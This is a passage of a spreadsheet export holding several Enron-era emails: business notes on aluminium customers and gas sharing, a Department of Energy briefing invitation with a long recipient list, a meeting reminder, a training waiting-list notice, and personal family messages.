As we discussed during our September 7 meeting, attached is a matrix_x000D_
showing the 10 Northwest Aluminum Direct Service Industries (DSI's)._x000D_
Since the curtailment agreements BPA has with Alcoa and Columbia Falls_x000D_
are confidential, am not privy to all their terms. However, I think the_x000D_
overall status is pretty accurate._x000D_
_x000D_
We can use this chart in our October 8 meeting to discuss possible DSI_x000D_
candidates for Enron services. Please let me know if you need any more_x000D_
information._x000D_
_x000D_
Attachment</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 01:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'yolanda.roberts@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'michael.moran@enron.com', 'bpittman@velaw.com', 'ann.ballard@enron.com', 'tana.jones@enron.com', 'eddie.moses@enron.com', 'tax.houston@enron.com'})</t>
  </si>
  <si>
    <t>Another Picture....</t>
  </si>
  <si>
    <t xml:space="preserve">Here is a great picture of little Haley Goodrow._x000D_
_x000D_
  y_x000D_
---------------------- Forwarded by Yolanda Roberts/Corp/Enron on 09/13/2000 _x000D_
08:54 AM ---------------------------_x000D_
_x000D_
_x000D_
"Henry Goodrow" &lt;henrygoodrow@hotmail.com&gt; on 09/12/2000 08:26:26 PM_x000D_
To: yolanda.roberts@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Another Picture...._x000D_
_x000D_
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DSCN0007.JPG_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Feb 2000 03:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris.long@enron.com', 'joe.hillings@enron.com'})</t>
  </si>
  <si>
    <t>Department of Energy Pre-departure Briefing w/ Asst. Secy. Goldwyn</t>
  </si>
  <si>
    <t xml:space="preserve">Joe?Chris - this covers some of my new turf.  We have, I am told, a power _x000D_
project in Gaza that we are working on.  It is probably early days, but _x000D_
perhpas Mac mcClelland in Dubai can shed some light on whether we would want _x000D_
to get that project on the Secretary of Energy's radar screen.   mcs _x000D_
---------------------- Forwarded by Mark Schroeder/LON/ECT on 09/02/2000 _x000D_
11:33 ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Scott &lt;s-mccarthy@bciu.org&gt;                           08/02/2000 22:00_x000D_
	_x000D_
_x000D_
To: mahn@usccmail.bms.com, calbee@dfintl.com, dean.allen@pareuro.com, _x000D_
falmeida_sikorsky@compuserve.com, emily.altman@msdw.com, _x000D_
jambler@ei.enron.com, ardilal@sji.pasanjor.com, jfarminton@west.raytheon.com, _x000D_
rarmstro@submarinesystems.com, wmarnold@sepiv.shellus.com, _x000D_
julius_asboth@raytheon.com, batay@ccgate.reci.com, taustell3@msn.com, _x000D_
azevedom@winstim.com, michael_j_ball@mail.northgrum.com, _x000D_
jim.bambrick@farrell.com, hbarraza@stewart.com, marta.bascom@airtouch.com, _x000D_
rogersbeall@compuserve.com, bill.beisswanger@ey.com, _x000D_
GB191587@MSXSEPC.SHELL.COM, thane.benedict@chadbourne.com, eric.benn@bms.com, _x000D_
cbennett@pfizer.com, bennett@pbworld.com, fberger@louisberger.com, _x000D_
eberk@icfkaiser.com, bethaje@texaco.com, mbey@chevron.com, _x000D_
nbillotti@tcco.com, gbirutis@arinc.com, joe.bizzano@nrgenergy.com, _x000D_
kblanchard@haythecurley.com, martha_blaxall@dai.com, blockri@winstim.com, _x000D_
jtbolden@cat.com, fmbonge@sepiv.shellus.com, carter.booth@chase.com, _x000D_
kbosche@fioc.com, uwe.bott@gecapital.com, boydj@winstim.com, _x000D_
jboyd@sfdrill.com, rboyd@enron.com, bbradford@tda.gov, _x000D_
jbrand@telephonics.com, kevin_f_brennan@email.mobil.com, _x000D_
jesus_briceno@raytheon.com, conrad_brown@res.raytheon.com, _x000D_
brown@connellco.com, coresorces@aol.com, nburakow@icfkaiser.com, _x000D_
reburgess@duke-energy.com, mburpoe@aol.com, harold_burson@bm.com, _x000D_
kent_burton@ogden-energy.com, BurtonLD@bp.com, ljbuss@duke-energy.com, _x000D_
tom.butler@chase.com, mitchell_s_butta@mail.northgrum.com, _x000D_
campbellj@winstim.com, margaret.h.campbell@bellatlantic.com, _x000D_
dick.carano@fluordaniel.com, dante.caravaggio@jacobs.com, _x000D_
nestor.carbonell@pepsico.com, charles_l_carpenter@mail.northgrum.com, _x000D_
fernando.carrizosa@wackenhutcorp.com, solardc@bellatlantic.net, _x000D_
charles_caruso@merck.com, brian.casey@corporate.ge.com, _x000D_
rcavey@americanstandard.com, chambej@md.ahp.com, chapmana@bp.com, _x000D_
coresorces@aol.com, rohit.chaudhry@chadbourne.com, _x000D_
armando_chavez@agilent.com, stevechesebro@pennzoil.com, pccjr@energy-usa.com, _x000D_
michael_claes@bm.com, rclegg@bellhelicopter.textron.com, _x000D_
marvin_e_clifton@email.mobil.com, ned.cloonan@aig.com, wclossey@lga.att.com, _x000D_
galen.cobb@halliburton.com, mike_cochran@anadarko.com, stevec@hostpj.usa.com, _x000D_
isabella.m.cointepas@sb.com, ecole@tamsconsultants.com, _x000D_
jean.l.cole@exxon.sprint.com, michael_coleman@parsons.com, rjcolgan@cat.com, _x000D_
barclay_collins@anadarko.com, stephanie.a.conaghan@chadbourne.com, _x000D_
cconlon@tcco.com, grover@connellco.com, ted@connellco.com, _x000D_
terry@connellco.com, jcook@saralee.com, dcooper@cromor.com, _x000D_
sy_corenson@hp.com, robert_a_costa@res.raytheon.com, ron.t.covais@lmco.com, _x000D_
coxfj@texaco.com, james_s_cox@mail.northgrum.com, dcrosson@dc.edelman.com, _x000D_
susan_crowley@merck.com, fcummins@nacds.org, cunninghamj@epenergy.com, _x000D_
scurley@haythecurley.com, darbym@ms.com, ian_davis@oxy.com, _x000D_
nadavis@mail.hac.com, juan.deleon@jacobs.com, don.deline@halliburton.com, _x000D_
diane_demers@dai.com, henry_somerville@fwc.com, o-dogruer@bciu.org, _x000D_
adolcimascolo@tamsconsultants.com, chuck.dominy@halliburton.com, _x000D_
j-donald@bciu.org, cduffy@mailer.kmec.com, eduffy@skadden.com, _x000D_
loretta.dunn@hughes.com, steve.dutton@comsat.com, catherine_dwyer@nyl.com, _x000D_
david.j.earnshaw@sb.com, dedelman@edelman.com, redelman@edelman.com, _x000D_
saelbert@amoco.com, ellswp@pfizer.com, dewaem@pfizer.com, _x000D_
everett_sally@bah.com, ralph_fairbanks@kmrpower.com, robert.fallon@chase.com, _x000D_
larryfarmer@halliburton.com, mfarrar@mail.arco.com, _x000D_
steve_farrar@guardian.com, afasciano@lucent.com, andrew.fawthrop@unocal.com, _x000D_
paul_feldman@anadarko.com, mpfernandez-baca@duke-energy.com, _x000D_
dfine@corp.sbc.com, louise.finnerty@pepsi.com, peter_finnerty@csx.com, _x000D_
peter.fitzgerald@chadbourne.com, c_tanai_fleenor@parsons.com, _x000D_
stephen.flett@aexp.com, George_A_Folsom@email.msn.com, fonseyp@texaco.com, _x000D_
martyforte@mindspring.com, jefox@mintz.com, bfree@chubb.com, _x000D_
orit.frenkel@corporate.ge.com, Howard.Frey@aig.com, _x000D_
douglas.m.fried@chadbourne.com, cfrost@forbes.com, ken_frydman@edelman.com, _x000D_
sfuller@chubb.com, michael.gadbaw@corporate.ge.com, lsgaibor@compuserve.com, _x000D_
mgale@warnaco.com, marykelley.k.gannon@bellatlantic.com, sgarber@sfdrill.com, _x000D_
gard6942@mlb.com, robert_gardner@email.mobil.com, wgardner@chubb.com, _x000D_
garibaldic@sji.pasanjor.com, ken_gaulden@sealand.com, nomad68@earthlink.net, _x000D_
eugene.gay@cpmx.saic.com, dgeanacopolous@akingump.com, _x000D_
lynn.gedanken@chadbourne.com, georgen@epenergy.com, _x000D_
ralph_gerson@guardian.com, peter.getsinger@db.com, sghilaga@nacds.org, _x000D_
sghilaga@ultracom.net, gillespie@scowcroft.com, gillickj@winstim.com, _x000D_
jon_d_glassman@mail.northgrum.com, kgoddard@pw-inc.com, _x000D_
arlene_delapaz@md.northgrum.com, neil.golden@chadbourne.com, larry@pira.com, _x000D_
enrique.l.gomez@lmco.com, randy.goode@sippican.com, _x000D_
william.greason@chadbourne.com, green_candy_a@cat.com, _x000D_
james_e_green@email.mobil.com, sgreen@unocal.com, _x000D_
dave.gribbin@halliburton.com, griffm@winstim.com, jgroberg@volt.com, _x000D_
grosswo@mail.northgrum.com, richard.guay@jacobs.com, k-gut@bciu.org, _x000D_
dean.l.guttormson@exxon.sprint.com, robert_w_haines@email.mobil.com, _x000D_
jwhakkinen@marathonoil.com, bill.hale@exxon.com, hall2r@kochind.com, _x000D_
william_e_hall@parsons.com, kenneth.hansen@chadbourne.com, _x000D_
kharbert@mailer.kmec.com, jhardy@ei.enron.com, harkinr@corpdc.utc.com, _x000D_
billritten@aol.com, scott.a.harris@lmco.com, hastied9@compuserve.com, _x000D_
lhay@chevron.com, brian_healy@merck.com, hedgep@pfizer.com, _x000D_
fernando.hegel@wackenhutcorp.com, neville_henry@anadarko.com, _x000D_
lynn_azar@anadarko.com, mherber@mail.arco.com, heroldra@bp.com, _x000D_
harry.hicks@ey.com, hillj2@bp.com, thill@dfintl.com, jhillin@enron.com, _x000D_
lsulliv@enron.com, james_hilton@parsons.com, santiago_hinojosa@bm.com, _x000D_
hirshr@israelemb.org, hitchcock@pbworld.com, _x000D_
thomas.hohenthaner@chadbourne.com, Irene-hollerback@ogden-energy.com, _x000D_
richard_hook@anadarko.com, horn6945@mlb.com, shorsley@ti.com, _x000D_
shorton@pbwt.com, jahoward@bechtel.com, peter.howell@citicorp.com, _x000D_
henry.hsiang@aig.com, lhudson@unocal.com, huntington_erin_b@lilly.com, _x000D_
bichord@unocal.com, j_anthony_imler@merck.com, wmir@chevron.com, _x000D_
ashfaq@usa-intl.com, contact@usa-intl.com, ernest_r_jackson@raytheon.com, _x000D_
jago@oldworldind.com, james.l.jamerson@lmco.com, jamesch1@mail.northgrum.com, _x000D_
jarvisa@md.ahp.com, jjeffrey@dttus.com, mjichlin@louisberger.com, _x000D_
oakley.johnson@aig.com, lionel.johnson@citicorp.com, _x000D_
kevin.b.jordan@chadbourne.com, paul.kaiser@nrgenergy.com, _x000D_
george_kappaz@kmrpower.com, rfolensbee@mailer.kmec.com, _x000D_
al.kappelmann@libertymutual.com, rkarlgaard@forbes.com, _x000D_
dickey_kathryn_m@lilly.com, patricia-katayama@dc.edelman.com, _x000D_
diana.keegan@aig.com, kelleyb@epenergy.com, john.r.kelly@exxon.sprint.com, _x000D_
kathleenkell@earthlink.com, donald_s_kendall@res.raytheon.com, _x000D_
tim.kernan@fluordaniel.com, Joyce.Choate@FLUORCORP.com, skerr@mail.arco.com, _x000D_
jkessler@porterwright.com, lk@lovainc.com, lovak@prodigy.net, _x000D_
fking@bellhelicopter.textron.com, richard.g.kirkland@lmco.com, _x000D_
helena.klumpp@chadbourne.com, jknight@fioc.com, _x000D_
joy_l_koch@mail.northgrum.com, rkochman@volt.com, mkoprulu@mfi-ny.com, _x000D_
pkorff@skadden.com, kostimv@texaco.com, ans.kristbergs@farrell-lines.com, _x000D_
sandra_j_kristoff@newyorklife.com, Alex_Kulpecz@AZURIX.enron.com, _x000D_
edward.kuncar@wackenhutcorp.com, jkuspa@mailer.kmec.com, _x000D_
christoph.ladanyi@gs.com, glandegger@pw-inc.com, rlarios@corp.sbc.com, _x000D_
laudienl@epenergy.com, lawrenjd@ix.netcom.com, _x000D_
david_ledesma@AZURIX.enron.com, ed.lee@aig.com, leet@winstim.com, _x000D_
denyse.lefever@lmco.com, richard_lehfeldt@missionenergy.com, _x000D_
llenfest@oracle.com, cel@energy-usa.com, john.libonati@owenscorning.com, _x000D_
jeff.lifur@chadbourne.com, duke.ligon@dvn.com, lynn_alleva@dai.com, _x000D_
jerry.d.lindstrom@lmco.com, juan_llovet@parsons.com, _x000D_
adriana.i.griffith@parsons.com, loderw@winstim.com, wlor@chevron.com, _x000D_
losi@pbworld.com, andrew.loughlin@libertymutual.com, phil_luks@kmrpower.com, _x000D_
rodney.j.macalister@usa.conoco.com, stuart.macdonald@chase.com, _x000D_
madden@farrell-lines.com, wmaddox@bellhelicopter.textron.com, _x000D_
mariella.mahan@enron.com, michael.d.maher@exxon.com, paul.mandry@avon.com, _x000D_
marani@israelemb.org, cmarcenaro@louisberger.com, amarchetti@hess.com, _x000D_
gary.c.marfin@usa.conoco.com, mmarino@tamsconsultants.com, _x000D_
trudy.marshall@nrgenergy.com, craig.martin@jacobs.com, _x000D_
joseph.martin@chase.com, keith.martin@chadbourne.com, momartin@estee.com, _x000D_
pedro_martinez@raytheon.com, richard.mathews@avon.com, _x000D_
bmay@bellhelicopter.textron.com, norman_c_mazurek@res.raytheon.com, _x000D_
chemarie@monmouth.com, s-mccarthy@bciu.org, _x000D_
jim.mccarty@libertyinternational.com, jmcfarla@us.oracle.com, _x000D_
Bruce_C._McKay@CORP.CNG.COM, McLaughlin@pbworld.com, rmcphail@dttus.com, _x000D_
james.g.melonas@bellatlantic.com, dgmengebier@cmsenergy.com, _x000D_
sandy.merber@corporate.ge.com, michel@pbworld.com, don_mickelwait@dai.com, _x000D_
milburi@mail.northgrum.com, jrmiller2@west.raytheon.com, _x000D_
john_minihane@fwc.com, simeon_l_moats@email.mobil.com, _x000D_
boyd.montgomery@unocal.com, cmoomjian@sfdrill.com, mmoore@acec.org, _x000D_
mmorley@edelman.com, elambert.com@mindspring.com, stewart@stewart.com, _x000D_
isabel_moya@dai.com, jmoyer@warnaco.com, rmulligan@chubb.com, _x000D_
kevin.mulvey@aig.com, deborah.e.myers@sb.com, ken_nadolny@anadarko.com, _x000D_
joyce_griffin@anadarko.com, tnanney@corp.sbc.com, naraf@winstim.com, _x000D_
hernan.narea@chase.com, nathanh@winstim.com, r_d_nelson@email.mobil.com, _x000D_
james.nelson@lmco.com, ted.nevins@aig.com, twnichol@oracle.com, _x000D_
michael_nocera@newyorklife.com, Rmnorthrup@cat.com, nosseira@ms.com, _x000D_
don_o'hare@sealand.com, olougga@mail.northgrum.com, brian.oneill@chase.com, _x000D_
oneillm@labs.wyeth.com, oneill@pbworld.com, john.b.o'sullivan@chadbourne.com, _x000D_
tolic@icnpharm.com, charlie.oliver@fluordaniel.com, josborne@stewart.com, _x000D_
jeffrey_osborne@parsons.com, wayne.osterman@libertymutual.com, _x000D_
paul.ostling@ey.com, bob.oswald@aexp.com, fpandith@mintz.com, _x000D_
mpanic@icnpharm.com, robert.papas@corporate.ge.com, Nancy.Patton@parsons.com, _x000D_
c-chris.pavlides@usa.conoco.com, jon.d.pender@sb.com, _x000D_
greg_pensabene@anadarko.com, rperez_sikorsky@compuserve.com, _x000D_
cperry@fcacorp.com, speske@aol.com, phillip.peters@ey.com, BPeters@volt.com, _x000D_
karen.peterson@bms.com, daniel.c.petri@bellatlantic.com, fphelps@unocal.com, _x000D_
barbara.phillips@airtouch.com, ann_pickard@email.mobil.com, _x000D_
gapickart@cmsenergy.com, pierrelouisl@winstim.com, bud.piland@mcdermott.com, _x000D_
bmay@bellhelicopter.textron.com, joe_pinto@hp.com, jeanne_hoerter@merck.com, _x000D_
pollarb@corpdc.utc.com, dpolo@icfkaiser.com, fjp@symbolic.com, _x000D_
jody.powers@halliburton.com, george_p_pradas@email.mobil.com, _x000D_
preissj@corpdc.utc.com, prieto@pbworld.com, lprosser@dttus.com, _x000D_
kpuvak@acec.org, jrafuse@unocal.com, rragan@bechtel.com, _x000D_
rod_j_ragan@parsons.com, draymond@acec.org, eregan@tamsconsultants.com, _x000D_
ReicheEA@bp.com, walt_reichert@hp.com, charles_o_richards@amoco.com, _x000D_
tim.richards@corporate.ge.com, al_richey@anadarko.com, riverpw@texaco.com, _x000D_
jack_roadhouse@parsons.com, joseph.robertson@wackenhutcorp.com, _x000D_
irobins@volt.com, damian.robinson@aexp.com, vrocca@louisberger.com, _x000D_
lberger@louisberger.com, eric.rohtla@aig.com, mrollin@mail.arco.com, _x000D_
diana.roner@wackenhutcorp.com, rosaj@epenergy.com, kfrose@sepiv.shellus.com, _x000D_
steven.rosenberg@hbo.com, larry_rosenblatt@email.mobil.com, _x000D_
garyross@pira.com, Maria.Ruess@comsat.com, peter.ew.russell@chase.com, _x000D_
steve_rutkowski@anadarko.com, bill.ryzinski@nrgenergy.com, _x000D_
arthur.sackler@twi.com, esamara@worldspace.com, nsamara@worldspace.com, _x000D_
antranig.sarkissian@citicorp.com, luis.sastre@lmco.com, _x000D_
jsatterwhite@sikorsky.com, nancysauer@pennzoil.com, rsaul@phrma.org, _x000D_
rscharar@fcacorp.com, jeschmeltzer@pbwt.com, william.schmidt@chadbourne.com, _x000D_
pschnell@skadden.com, thomas.d.schoegler@lmco.com, rschofield@hess.com, _x000D_
marilyn.schorin@intl.pepsi.com, mschroeder@enron.com, _x000D_
pschuchter@mailer.kmec.com, aschwartz@pw-inc.com, bschweigel@oldworldind.com, _x000D_
robert.shapiro@chadbourne.com, alan.j.shepherd@mw.com, _x000D_
mollie.shields@bms.com, larry_g_shockley@parsons.com, sbsi@chevron.com, _x000D_
william.h.siefken@lmco.com, kruskaia.sierra-escalante@chadbourne.com, _x000D_
silkenatj@winstim.com, ronald.singer@ae.ge.com, elliott.slade@db.com, _x000D_
denis_slavich@kmrpower.com, midges@ms.com, steve.smith@gecapital.com, _x000D_
sandy.o'meara@gecapital.com, jack.w.snyder@lmco.com, solbera@texaco.com, _x000D_
solliea@texaco.com, francis.stankard@aexp.com, rystebbin@aol.com, _x000D_
mstewart@dc.textron.com, pstirlin@us.oracle.com, dcarlson@mailer.kmec.com, _x000D_
astraus@skadden.com, eugene.r.sullivan@chadbourne.com, _x000D_
bill_sullivan@anadarko.com, mark.f.supko@lmco.com, sally.susman@aexp.com, _x000D_
david.syphard@crssc.com, president@artleygroup.com, VTarallo@aol.com, _x000D_
tarbels@pweh.com, stephen_s_teel@res.raytheon.com, arthur.thomas@ey.com, _x000D_
c_nigel_thompson@merck.com, dick.thompson@bms.com, thorn@ei.enron.com, _x000D_
bthornton@fwtxusa.org, james_e_thrash@parsons.com, p-tichansky@bciu.org, _x000D_
jim.e.tobin@aexp.com, john.tognino@nasdaq.com, luis.torres@chadbourne.com, _x000D_
TownshME@bp.com, strendic@us.oracle.com, trevijm@texaco.com, _x000D_
jacktymann@aol.com, jtymann@worldspace.com, elizabeth.a.tyson@sb.com, _x000D_
ulrich@pbworld.com, urbans@eu1.bp.com, munnj1@bp.com, _x000D_
gvandyke@vancoenergy.com, philip.vaughn@fluordaniel.com, _x000D_
andy_veje@parsons.com, frank.verrastro@dvn.com, aracelia.vila@spcorp.com, _x000D_
judith.a.vincent@usa.conoco.com, evis65677@aol.com, _x000D_
vlachpa@mail.northgrum.com, chaim.wachsberger@chadbourne.com, _x000D_
jwalden@vancoenergy.com, peter_walters@guardian.com, _x000D_
averhulst@worldnet.att.net, eward@skadden.com, _x000D_
kenneth.j.warnock@bellatlantic.com, c-watson@bciu.org, _x000D_
mweaver@fortworthchamber.com, paul.weber@chadbourne.com, _x000D_
thomas_h_weese@ccgate.ueci.com, jwei@haythecurley.com, v-weil@bciu.org, _x000D_
joel.a.weiss@lmco.com, dwestfa@enron.com, john_m_white@eo.raytheon.com, _x000D_
jwhitman@nacds.org, scott_whitney@ogden-energy.com, jim_whittaker@hp.com, _x000D_
guenther.o.wilhelm@exxon.com, t-wilkes@bciu.org, cwilkison@worldspace.com, _x000D_
ron.will@nrgenergy.com, elizabeth.f.williamson@usa.conoco.com, _x000D_
dwillkens@dfintl.com, scarbroughs_plum@usa.net, _x000D_
Debra_Winchester@res.raytheon.com, cwindels@pfizer.com, frank.wisner@aig.com, _x000D_
wisnoskik@epenergy.com, dwolff@louisberger.com, ctompkins@louisberger.com, _x000D_
kwoodcock@aesc.com, sross@aesc.com, WoodsHR@bp.com, _x000D_
ewright@west.raytheon.com, wrightp12@bp.com, fouquepa@bp.com, _x000D_
oyandle@itsa.org, yannif@labs.wyeth.com, cordelia_m._yoon@newyorklife.com, _x000D_
lzak@mintz.com, ezsol@aol.com, lawrence.ziman@chadbourne.com, _x000D_
czimmerman@dfintl.com, dzsebik_sikorsky@compuserve.com_x000D_
cc:  _x000D_
_x000D_
Subject: Department of Energy Pre-departure Briefing w/ Asst. Secy. Goldwyn_x000D_
_x000D_
_x000D_
TO:  BCIU Members_x000D_
FROM: Scott McCarthy_x000D_
  Director of Programs_x000D_
  Ph: 212-490-0460, ext. 224_x000D_
  Fx: 212-697-8526_x000D_
_x000D_
PRE-DEPARTURE BRIEFING_x000D_
_x000D_
BCIU and the U.S. Department of Energy are pleased to announce an industry_x000D_
briefing with:_x000D_
_x000D_
ASSISTANT SECRETARY OF ENERGY DAVID GOLDWYN_x000D_
IN PREPARATION FOR ENERGY SECRETARY BILL RICHARDSON'S_x000D_
MIDDLE EAST TRIP_x000D_
(EGYPT, ISRAEL, PALESTINIAN AUTHORITY,_x000D_
 KUWAIT, AND SAUDI ARABIA)_x000D_
_x000D_
_x000D_
DATE: Thursday, February 17, 2000_x000D_
TIME: 10:30 a.m. - 11:30 a.m._x000D_
PLACE: Department of Energy_x000D_
  Room 7C016_x000D_
  1000 Independence Avenue, S.W._x000D_
  Washington, DC 20036_x000D_
_x000D_
_x000D_
Secretary of Energy Bill Richardson is visiting the Middle East February_x000D_
19-26 where he will meet with officials in Egypt, Israel, the Palestinian_x000D_
Authority, Kuwait and Saudi Arabia.  He is expected to sign bilateral_x000D_
Science and Technology Agreements (or annexes to existing agreements)_x000D_
focused on solar and renewable energy, advanced power systems, and/or_x000D_
electric vehicle programs with Egypt and Israel, as well as an Energy_x000D_
Cooperation Agreement with the Palestinian Authority.  He will meet the_x000D_
leaderships of Kuwait and Saudi Arabia on international oil company_x000D_
involvement in the upstream oil sector and other issues important to U.S._x000D_
industry._x000D_
_x000D_
BCIU invites you to join Department of Energy Assistant Secretary for_x000D_
International Affairs David Goldwyn, Deputy Assistant Secretary Theresa_x000D_
Fariello, Special Assistant to Secretary Richardson for Policy Rachel King,_x000D_
and Director for NIS, Russia and Middle East Affairs Len Coburn for an_x000D_
industry roundtable in preparation for this visit.  Companies are_x000D_
encouraged to bring background material for the Secretary's use during the_x000D_
trip to this meeting if they have not been provided to the Department of_x000D_
Energy previously._x000D_
_x000D_
If you have any questions regarding this program, please contact Jeffrey_x000D_
Donald at tel. (202) 775-6074, fax: (202) 775-6025; E-MAIL j-donald@bciu.org._x000D_
-------------------------------------------------------------_x000D_
If you would like to attend, please complete the form below and respond via_x000D_
reply e-mail OR fax your reservation to (202) 775-6025._x000D_
_x000D_
Name:____________________ Title:___________________________x000D_
_x000D_
Social Security Number (for clearance into_x000D_
 the Department of Energy):_______________________x000D_
_x000D_
Company:___________________________________________________x000D_
_x000D_
Address:___________________________________________________x000D_
_x000D_
Phone:__________________   Fax:_______________________x000D_
_x000D_
Email:____________________________________x000D_
_x000D_
Program number: 3750JD_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 03:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pfarmer@mpisd.net'})</t>
  </si>
  <si>
    <t>Prom Dress Shopping</t>
  </si>
  <si>
    <t>Hi, Just wanted to let you know that Lacy's sugar levels are staying up _x000D_
pretty well.  She was down to 51 this morning, but she took a shot last night _x000D_
&amp; I guess she didn't eat enough ice cream.  She was mad at me cause I didn't _x000D_
give her more than I did.  But it's so hard to know exactly how to handle it _x000D_
'cause she's been going to bed a little high &amp; getting up a little high.  But _x000D_
anyway, she's doing better &amp; I guess she'll always be mad &amp; think I'm _x000D_
mistreating her.  I stay stressed out every day not knowing if she got low _x000D_
after I left &amp; passed out &amp; no one would know it.  I'm going to try to get a _x000D_
cell phone &amp; have her call me when she gets there--I think--I don't _x000D_
know--she'll be mad about that too.  But the other night, she didn't eat _x000D_
right after she took her shot, then didn't eat anything fast acting &amp; got in _x000D_
the truck to go over to Phillip's to get research info from his computer, got _x000D_
low &amp; had to pull over &amp; eat sugar tabs.  So that's what scares me.  She knew _x000D_
to eat righ!_x000D_
t after she took that shot &amp; didn't. But she was high before she took it &amp; I _x000D_
guess she didn't think about it getting low. I don't know what will happen to _x000D_
her when she leaves home._x000D_
_x000D_
But anyway, I wanted to let you know that we're going to Dallas to look for _x000D_
the prom dress &amp; shoes, don't know if we will stay all night or not. I _x000D_
haven't talked to Shane &amp; Shelley.  I wanted to stay &amp; go to Saturn Rd. to _x000D_
church &amp; go to the singles class.  But I don't know what Shane &amp; Shelley have _x000D_
planned.  So we'll be back either Sat. night or Sun. Lacy has to be back to _x000D_
work on 3 research papers &amp; projects that are all due at once.  So, wish us _x000D_
luck.  Any donations will be appreciated!  I hear they're more than I was _x000D_
expecting. But anyway, I don't intend to go overboard.  Maybe there will be _x000D_
some sales._x000D_
Hope my grandsons are doing ok.  I bet they were glad that their Daddy got _x000D_
back home Sunday. Hug them for me &amp; tell Cole that Mimi can't wait to see his _x000D_
bunkbeds. Love ya'll</t>
  </si>
  <si>
    <t>Tue, 14 Aug 2001 12:29:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michael.murdter@rda.co.santa-clara.ca.us'})</t>
  </si>
  <si>
    <t>Mercy</t>
  </si>
  <si>
    <t>Hey fruitcake......._x000D_
_x000D_
When does Elsa come in?  She can't find the itinerary and figures you have it.  =)  Are you coming up here also?_x000D_
_x000D_
love ya,_x000D_
_x000D_
d</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 00:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robin.treadwell@enron.com'})</t>
  </si>
  <si>
    <t>Re: URGENT - PRC MEETING INFORMATION</t>
  </si>
  <si>
    <t xml:space="preserve">Robin I have a conflict with this date because this is the time for the _x000D_
Global Finance PRC which I will need to attend. Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Robin L Treadwell_x000D_
11/29/2000 07:50 AM_x000D_
To: Joe Kishkill/SA/Enron@Enron, Jeffrey E _x000D_
Sommers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rob G Gay/NA/Enron@Enron, Remi _x000D_
Collonges/SA/Enron@Enron, Connie F Estrems/NA/Enron@Enron, _x000D_
paulodf@uol.com.br, Maria Ines Granado/SA/Enron@Enron, Michael _x000D_
Guerriero/SA/Enron@Enron, Richard A Lammers/SA/Enron@Enron, Joao Carlos _x000D_
Albuquerque/SA/Enron@Enron, Brett R Wiggs/SA/Enron@Enron, Federico _x000D_
Cerisoli/SA/Enron@Enron, Don Black/SA/Enron@Enron, Jose _x000D_
Bestard/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John Novak/SA/Enron@Enron, Steve _x000D_
Hopper@Transredes, Roderick Blackham/SA/Enron@Enron, Ricky Lynn _x000D_
Waddell/SA/Enron@Enron_x000D_
cc: Fernanda Fernandes/SA/Enron@Enron, Miguel Padron/NA/Enron@ENRON, Karen E _x000D_
Campos/NA/Enron@Enron _x000D_
_x000D_
Subject: URGENT - PRC MEETING INFORMATION_x000D_
_x000D_
_x000D_
_x000D_
AS A REMINDER, _x000D_
_x000D_
YOU ARE SCHEDULED TO ATTEND THE ESA DIRECTOR/GM PRC MEETING AS A COMMITTEE _x000D_
MEMBER._x000D_
_x000D_
MEETING INFORMATION_x000D_
_x000D_
Thursday, November 30_x000D_
_x000D_
8:00 a.m. Houston, Conf Rm 3AC-14C2_x000D_
11:00 a.m. Buenos Aires, Conf Rm _x000D_
12:00 p.m. Sao Paulo, Conf Rm 6C3_x000D_
_x000D_
Video Conference w/Sao Paulo, Houston, Buenos Aires_x000D_
_x000D_
AT&amp;T Dial In_x000D_
From U.S. 1-877-322-9648_x000D_
Outside U.S. 1-954-797-0718_x000D_
Access Code 458290_x000D_
_x000D_
If you have any questions, please call me at 713/646-7895._x000D_
_x000D_
Thank you_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 20 Sep 2001 12:41:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>You are included in the Waiting List</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
_x000D_
Dear MICHAEL TAYLOR,_x000D_
_x000D_
_x000D_
You have been added to the waiting list for the following._x000D_
_x000D_
_x000D_
Course Title : 'Derivatives II - Energy Derivatives Advance Structures &amp; Marketing'_x000D_
Session Code : 100401_x000D_
_x000D_
_x000D_
The course details are given below for your confirmation._x000D_
_x000D_
_x000D_
Type            : Instructor Led Course_x000D_
Course Code     : DERIV2_x000D_
_x000D_
_x000D_
Session Code    : 100401_x000D_
Starting Date   : Oct 4, 2001 8:00 AM_x000D_
Ending Date     : Oct 5, 2001 5:00 PM_x000D_
_x000D_
_x000D_
Number of Units : 16_x000D_
price           : $800.00_x000D_
_x000D_
_x000D_
Location        : EB552_x000D_
                  Enron Building_x000D_
                  1400 Smith_x000D_
                  Houston_x000D_
                  http://_x000D_
_x000D_
_x000D_
Meetings        :_x000D_
      Start Time:  Oct 4, 2001 8:00 AM_x000D_
        End Time:  Oct 5, 2001 5:00 PM_x000D_
     No instructors or rooms have been assigned to this meeting._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
You will be notified if a seat opens._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thank you,_x000D_
Docent Learning Management System._x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 14:04:40 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lhyme@utilicorp.com'})</t>
  </si>
  <si>
    <t>USGT/TW West Sharing for November</t>
  </si>
  <si>
    <t xml:space="preserve">Leslie:_x000D_
_x000D_
Here is the spreadsheet through November 24th.  To date, we have stayed at the .0245 commodity floor for volumes flowing West._x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
